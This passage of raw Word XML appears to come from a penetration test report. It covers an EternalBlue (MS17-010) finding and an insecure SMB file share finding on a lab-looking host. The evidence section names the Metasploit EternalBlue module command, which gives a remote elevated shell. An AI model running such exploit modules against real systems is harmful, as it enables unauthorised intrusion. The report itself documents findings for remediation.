          <w:p w14:paraId="5C8BB7D3" w14:textId="77777777" w:rsidR="00472496" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="1133"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidRPr="0062143B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>CVE-2017-0144</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> – tenable Eternal Blue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7717F5BC" w14:textId="77777777" w:rsidR="00472496" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="1133"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:hyperlink r:id="rId12" w:anchor="vulnerability-information" w:history="1">
              <w:r w:rsidRPr="00FC6909">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>Microsoft Security Bulletin MS17-010 - Critical</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Workaround running Legacy systems</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D3B3690" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="004F0AF2" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="1133"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidRPr="00BC1063">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Exploitation of Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BC41123" w14:textId="77777777" w:rsidR="001F4050" w:rsidRPr="004F0AF2" w:rsidRDefault="001F4050">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF40C6B" w14:textId="1988C234" w:rsidR="001F4050" w:rsidRPr="006C56F9" w:rsidRDefault="001F4050" w:rsidP="008B5990">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1725"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C56F9">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D624541" w14:textId="63EF1E59" w:rsidR="008B5990" w:rsidRDefault="006C56F9" w:rsidP="008A3E5E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1725"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C56F9">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Running the `use exploit/windows/smb/ms17_010_eternalblue` module in Metasploit exploits a vulnerability in the SMBv1 protocol on Windows systems, allowing an attacker to gain </w:t>
      </w:r>
      <w:r w:rsidR="004C4EF1">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a remote shell with an </w:t>
      </w:r>
      <w:r w:rsidRPr="006C56F9">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>elevated privileg</w:t>
      </w:r>
      <w:r w:rsidR="004C4EF1">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="006C56F9">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB271C" w14:textId="77777777" w:rsidR="00295F87" w:rsidRDefault="003D1FE9" w:rsidP="00295F87">
      <w:pPr>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1725"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46088B60" wp14:editId="1407FC9F">
            <wp:extent cx="6711950" cy="3684905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85948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89563" name="Picture 859489563"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6711950" cy="3684905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438D90A" w14:textId="5160DE0B" w:rsidR="00471C45" w:rsidRDefault="00295F87" w:rsidP="00295F87">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295F87">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00295F87">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00295F87">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00295F87">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006E2051">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00295F87">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00295F87">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>. Eternal Blue Vulnerability Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0291A30E" w14:textId="77777777" w:rsidR="00CB7F23" w:rsidRDefault="00CB7F23" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="4AFE6004" w14:textId="77777777" w:rsidR="00CB7F23" w:rsidRDefault="00CB7F23" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="3FAB7321" w14:textId="77777777" w:rsidR="00CB7F23" w:rsidRDefault="00CB7F23" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="73D0BA9B" w14:textId="77777777" w:rsidR="00CB7F23" w:rsidRDefault="00CB7F23" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="25C07346" w14:textId="77777777" w:rsidR="00CB7F23" w:rsidRDefault="00CB7F23" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="6B91DBDF" w14:textId="77777777" w:rsidR="00CB7F23" w:rsidRDefault="00CB7F23" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="6508642E" w14:textId="77777777" w:rsidR="00CB7F23" w:rsidRDefault="00CB7F23" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="04C6708A" w14:textId="77777777" w:rsidR="00CB7F23" w:rsidRDefault="00CB7F23" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="451DFC29" w14:textId="77777777" w:rsidR="00DE1F3F" w:rsidRDefault="00DE1F3F" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="2F1217B1" w14:textId="77777777" w:rsidR="00DE1F3F" w:rsidRDefault="00DE1F3F" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="630A2F10" w14:textId="77777777" w:rsidR="00DE1F3F" w:rsidRDefault="00DE1F3F" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="11740809" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="5A4D7DB9" w14:textId="77777777" w:rsidR="006528B5" w:rsidRPr="00CB7F23" w:rsidRDefault="006528B5" w:rsidP="00CB7F23"/>
    <w:p w14:paraId="1B7FCB3F" w14:textId="44ED6372" w:rsidR="00607D78" w:rsidRPr="002C7E04" w:rsidRDefault="00607D78" w:rsidP="00582913">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc169647993"/>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Finding</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPT-</w:t>
      </w:r>
      <w:r w:rsidR="00EA53E1">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>002</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure File Shares - </w:t>
      </w:r>
      <w:r w:rsidRPr="001334A6">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00607D78" w:rsidRPr="004F0AF2" w14:paraId="7686FE7B" w14:textId="77777777" w:rsidTr="004F4F54">
        <w:trPr>
          <w:trHeight w:val="763"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ED7D31" w:themeFill="accent2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10A4F785" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="00205061" w:rsidRDefault="00607D78" w:rsidP="00FB57DE">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B4C6E7" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="23B875AC" w14:textId="762C58EE" w:rsidR="00607D78" w:rsidRPr="004F0AF2" w:rsidRDefault="00607D78" w:rsidP="002B0FC8">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="43"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001334A6">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">The tester uncovered multiple </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB </w:t>
            </w:r>
            <w:r w:rsidRPr="001334A6">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">file shares where all Domain Users have </w:t>
            </w:r>
            <w:r w:rsidR="002D7B45">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>anonymous access</w:t>
            </w:r>
            <w:r w:rsidRPr="001334A6">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00607D78" w:rsidRPr="004F0AF2" w14:paraId="0FE58B8E" w14:textId="77777777" w:rsidTr="001334A6">
        <w:trPr>
          <w:trHeight w:val="1631"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ED7D31" w:themeFill="accent2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33DD9AF6" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="00205061" w:rsidRDefault="00607D78" w:rsidP="00FB57DE">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="247" w:lineRule="exact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Risk:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="578EA6F5" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="006300A5" w:rsidRDefault="00607D78" w:rsidP="0023533E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
              <w:ind w:right="43"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006300A5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Likelihood: </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0932">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidRPr="006300A5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4674">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SMB is a widely used protocol for file and printer sharing in Windows and Unix environments. Its prevalence makes it a prime target for attackers seeking to exploit vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidRPr="00C92A6B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4674">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A7EBCF" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="006300A5" w:rsidRDefault="00607D78" w:rsidP="0023533E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
              <w:ind w:right="43"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="430E1FC4" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="004F0AF2" w:rsidRDefault="00607D78" w:rsidP="00C92A6B">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
              <w:ind w:right="43"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006300A5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact: </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0932">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidRPr="006300A5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidRPr="0083489D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>An attacker who gains a foothold in this domain can use this access to search for files containing sensitive data such as credentials and potentially write malicious files to the file shares</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC4335">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r w:rsidRPr="0083489D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00607D78" w:rsidRPr="004F0AF2" w14:paraId="5A5719C9" w14:textId="77777777" w:rsidTr="001334A6">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ED7D31" w:themeFill="accent2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="742788E5" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="00205061" w:rsidRDefault="00607D78" w:rsidP="00FB57DE">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="247" w:lineRule="exact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Affected Host</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> or Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B4C6E7" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2BBBAFE1" w14:textId="4CC56550" w:rsidR="00607D78" w:rsidRPr="004F0AF2" w:rsidRDefault="00CB7F23" w:rsidP="002B0FC8">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.10.10.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00607D78" w:rsidRPr="004F0AF2" w14:paraId="6983754A" w14:textId="77777777" w:rsidTr="001334A6">
        <w:trPr>
          <w:trHeight w:val="271"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ED7D31" w:themeFill="accent2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A85260F" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="00205061" w:rsidRDefault="00607D78" w:rsidP="00FB57DE">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="247" w:lineRule="exact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4111F8D2" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="00170851" w:rsidRDefault="00607D78" w:rsidP="00607D78">
            <w:pPr>
